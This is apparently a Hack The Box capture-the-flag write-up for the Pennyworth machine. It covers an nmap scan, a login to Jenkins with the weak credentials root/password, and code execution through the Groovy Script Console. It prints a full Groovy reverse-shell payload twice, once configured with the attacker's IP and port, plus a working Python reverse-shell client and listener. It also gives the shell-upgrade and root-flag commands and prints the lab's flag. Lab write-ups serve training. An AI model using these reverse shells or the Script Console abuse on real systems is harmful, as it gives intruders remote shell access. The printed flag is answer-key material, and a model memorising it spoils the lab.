HTB:Pennyworth[WriteUP]

Table of Contents

Connect to the HTB server and start the target machine

1.What does the acronym CVE stand for?

2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

3.What is the version of the service running on port 8080?

4.What version of Jenkins is running on the target?

5.What type of script is accepted as input on the Jenkins Script Console?

6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

8.What switch should we use with netcat for it to use UDP transport mode?

9.What is the term used to describe making a target host initiate a connection back to the attacker host?

ROOT_FLAG:9cdfb439c7876e703e307864c9167a15


Connect to the HTB server and start the target machine

Target IP: 10.129.235.133

Assigned IP: 10.10.16.12


1.What does the acronym CVE stand for?

CVE stands for Common Vulnerabilities and Exposures.

CVE is a public naming standard for vulnerabilities. It assigns one identifier to each publicly known security vulnerability or exposure, so that researchers, vendors and users can refer to and track the same issue consistently, which improves overall defensive posture.


2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

In cybersecurity, the CIA triad stands for: Confidentiality, Integrity, Availability.

Confidentiality ensures that information is accessible only to authorized users; integrity guarantees that information is not tampered with in storage or in transit; availability ensures that authorized users can reliably access information and resources whenever they need them.


3.What is the version of the service running on port 8080?

Use nmap to run default-script and service/version detection against port 8080 of the target:

nmap -sC -sV -p 8080 {TARGET_IP}

In the nmap output, the VERSION column shows the service as: Jetty 9.4.39.v20210325


4.What version of Jenkins is running on the target?

Open the target URL in a browser: http://{TARGET_IP}:8080

It redirects straight to a login page; a quick weak-credential brute force yielded the following account:

Username: root

Password: password

Once in the dashboard, the Jenkins version is shown in the bottom-right corner of the page: 2.289.1
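As an added example (not part of the original write-up), the same two version strings can be pulled from the HTTP response headers without logging in: Jetty announces itself in the Server header, which is what nmap's -sV match is built on, and Jenkins adds an X-Jenkins header carrying its version to its responses, including the 403 it returns to an unauthenticated request. The sample response below is constructed; its values mirror the findings above, and the Date and cookie values are made up.

```python
import re
import urllib.error
import urllib.request

# Constructed sample: headers a Jenkins-on-Jetty instance returns for GET /
# when the client is not logged in (Date and cookie values are made up).
SAMPLE_RESPONSE = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Set-Cookie: JSESSIONID.0123abcd=node0example.node0; Path=/; HttpOnly\r\n"
    "X-Jenkins: 2.289.1\r\n"
    "Content-Type: text/html;charset=utf-8\r\n"
    "Server: Jetty(9.4.39.v20210325)\r\n"
    "\r\n"
)


def parse_versions(raw_headers):
    """Extract the servlet-container and Jenkins versions from raw HTTP
    headers. Returns {'jetty': ..., 'jenkins': ...}, None where absent."""
    versions = {"jetty": None, "jenkins": None}
    for line in raw_headers.split("\r\n"):
        if ":" not in line:
            continue  # status line or blank line
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "server":
            # Jetty's default banner looks like "Jetty(9.4.39.v20210325)"
            m = re.fullmatch(r"Jetty\(([^)]+)\)", value)
            if m:
                versions["jetty"] = m.group(1)
        elif name == "x-jenkins":
            versions["jenkins"] = value
    return versions


def fetch_versions(url, timeout=5):
    """Run the same extraction against a live host (not used by the offline
    demo). An unauthenticated request to Jenkins is answered with a 403 or a
    redirect to /login; urllib raises HTTPError on the 403, but the headers
    are still available on the error object."""
    req = urllib.request.Request(url, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            headers = resp.headers
    except urllib.error.HTTPError as e:
        headers = e.headers
    raw = "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return parse_versions(raw)


if __name__ == "__main__":
    print(parse_versions(SAMPLE_RESPONSE))
```

Run fetch_versions("http://{TARGET_IP}:8080/") against the box to compare with the nmap result and the dashboard footer; the parser deliberately ignores everything except the two headers it needs, so an unexpected banner simply yields None rather than a wrong version.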


5.What type of script is accepted as input on the Jenkins Script Console?

Click Manage Jenkins in the left navigation bar.

Scroll down on the right and find: Script Console

Open it and read the description on the script console page:

Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the ‘println’ command to see the output (if you use System.out, it will go to the server’s stdout, which is harder to see.) Example:

println(Jenkins.instance.pluginManager.plugins)

All the classes from all the plugins are visible. jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.

From this description, the Jenkins Script Console accepts Groovy scripts as input.


6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

Reverse shell scripts of various types can be found on the 棱角 (Edge Forum) community site; the Groovy one is:

String host="{NATIVE_IP}";                       // attacker (listener) address
int port={NATIVE_PORT};                          // attacker listening port
String cmd="/bin/bash";                          // shell to spawn; "cmd.exe" on Windows
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);                  // the target connects back to the attacker
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());    // shell stdout -> socket
  while(pe.available()>0)so.write(pe.read());    // shell stderr -> socket
  while(si.available()>0)po.write(si.read());    // socket -> shell stdin
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}  // exitValue() throws while the shell is still running
};
p.destroy();s.close();

If the target were a Windows machine, the String cmd field would be changed to: "cmd.exe"


7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

This is a general-knowledge question: ifconfig. Adding the -a switch lists all network interfaces, including those that are down.

ifconfig -a

My tun0 interface has the IP: 10.10.16.12


8.What switch should we use with netcat for it to use UDP transport mode?

Check netcat's options:

nc -h

This shows that the -u switch makes netcat use UDP transport mode.


9.What is the term used to describe making a target host initiate a connection back to the attacker host?

The port in the payload is your own choice, so my full payload is:

String host="10.10.16.12";                       // my tun0 address
int port=1425;                                   // port my nc listener is bound to
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());    // shell stdout -> socket
  while(pe.available()>0)so.write(pe.read());    // shell stderr -> socket
  while(si.available()>0)po.write(si.read());    // socket -> shell stdin
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}  // leave the loop once the shell exits
};
p.destroy();s.close();

Start a listener on that port with nc, then run the script in the Script Console to obtain a reverse shell: "reverse shell" is the term for making the target host initiate a connection back to the attacker host.
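As an added example (not from the write-up or the forum script), here is the same connect-back logic as the Groovy payload above written in Python, with both ends in one process so it runs offline on loopback: the "attacker" listens like nc, the "target" opens the outbound connection and wires a shell to it, and the cmd choice from question 6 is handled the same way (cmd.exe on Windows). Assumptions: /bin/sh is used instead of the write-up's /bin/bash so the demo runs on minimal hosts, and the listener port is chosen by the OS.

```python
import platform
import socket
import subprocess
import threading


def shell_for_platform(system=None):
    """The value the Groovy snippet's `String cmd` would hold: cmd.exe on
    Windows, a POSIX shell elsewhere (assumption: /bin/sh, not /bin/bash,
    so the demo also works on minimal images)."""
    system = system or platform.system()
    return "cmd.exe" if system == "Windows" else "/bin/sh"


def connect_back(host, port, cmd=None):
    """Target side. The target opens the TCP connection *to* host:port (that
    outbound direction is what makes it a reverse shell), spawns a shell and
    pumps bytes between the shell's stdio and the socket, as the Groovy
    payload does with ProcessBuilder and Socket. Returns the shell's exit code."""
    cmd = cmd or shell_for_platform()
    sock = socket.create_connection((host, port))
    proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT, bufsize=0)

    def sock_to_shell():
        # attacker input -> shell stdin
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                proc.stdin.write(data)
        except OSError:
            pass
        finally:
            try:
                proc.stdin.close()
            except OSError:
                pass

    def shell_to_sock():
        # shell stdout+stderr (merged, like redirectErrorStream(true)) -> attacker
        try:
            for chunk in iter(lambda: proc.stdout.read(4096), b""):
                sock.sendall(chunk)
        except OSError:
            pass
        finally:
            try:
                sock.shutdown(socket.SHUT_RDWR)  # also unblocks sock_to_shell
            except OSError:
                pass
            sock.close()

    threading.Thread(target=sock_to_shell, daemon=True).start()
    t_out = threading.Thread(target=shell_to_sock, daemon=True)
    t_out.start()
    proc.wait()            # same exit condition as the Groovy p.exitValue() probe
    t_out.join(timeout=5)
    return proc.returncode


def attacker_listener(bind="127.0.0.1", port=0):
    """Attacker side, the equivalent of `nc -lvnp <port>`. Port 0 lets the OS
    pick a free port; the socket and the chosen port are returned."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def run_demo(commands=(b"echo pwned-via-reverse-shell\n", b"exit\n"), cmd=None):
    """Loopback demo: listen, let the target connect back, send the commands
    and collect everything the shell returns. Returns the received bytes."""
    srv, port = attacker_listener()
    target = threading.Thread(target=connect_back, args=("127.0.0.1", port, cmd),
                              daemon=True)
    target.start()
    conn, _ = srv.accept()          # the connection arrives from the target
    conn.settimeout(10)
    for c in commands:
        conn.sendall(c)
    received = b""
    try:
        while True:
            data = conn.recv(4096)
            if not data:            # shell exited, target closed the socket
                break
            received += data
    except socket.timeout:
        pass
    conn.close()
    srv.close()
    target.join(timeout=10)
    return received


if __name__ == "__main__":
    print(run_demo().decode(errors="replace"))
```

The connection direction is the whole point: the listener never reaches out to the target, which is why a reverse shell works through NAT and inbound firewalls that would block a bind shell.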


Use script to spawn an interactive shell:

script /dev/null -c bash

Finally, flag.txt is found in the /root directory, or just run the command to read it directly:

cat /root/flag.txt

ROOT_FLAG:9cdfb439c7876e703e307864c9167a15
